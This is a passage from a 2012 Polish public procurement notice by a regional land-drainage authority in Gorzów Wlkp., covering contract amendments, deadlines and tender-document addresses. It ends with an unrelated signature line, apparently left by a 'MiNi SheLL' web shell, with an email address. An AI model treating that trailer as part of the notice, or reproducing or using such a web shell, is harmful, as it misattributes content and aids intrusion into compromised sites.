    pod warunkiem wystąpienia następujących przypadków:
    - zdarzeń losowych (choroby, śmierci) ,
    - nie wywiązywanie się osób z obowiązków wynikających z niniejszej umowy,
    - rezygnacja tych osób w formie pisemnej z wykonywania swoich obowiązków.
5. O wystąpieniu okoliczności , które mogą mieć wpływ na zmiany wprowadzane w umowie 
    Nadzór Inwestorski jest zobowiązany najpóźniej w terminie 7 dni od ich wystąpienia,  
    zawiadomić pisemnie zamawiającego.
6. Zmiany umowy będą wymagać formy pisemnego aneksu podpisanego przez obie strony i 
    dopuszczalne będą w granicach unormowań ustawowych, gdy zamawiający przewidział możliwość ich dokonania w dokumentach przetargowych, będących integralną częścią umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://melioracja.lubuskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze 
 Oddział w Gorzowie Wlkp. 
 ul. Myśliborska 52 , 66-413 Gorzów Wlkp. fax: 95 7285 931.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 10:00, miejsce: Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze 
 Oddział w Gorzowie Wlkp. 
 ul. Myśliborska 52 , 66-413 Gorzów Wlkp. sekretariat pok.2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com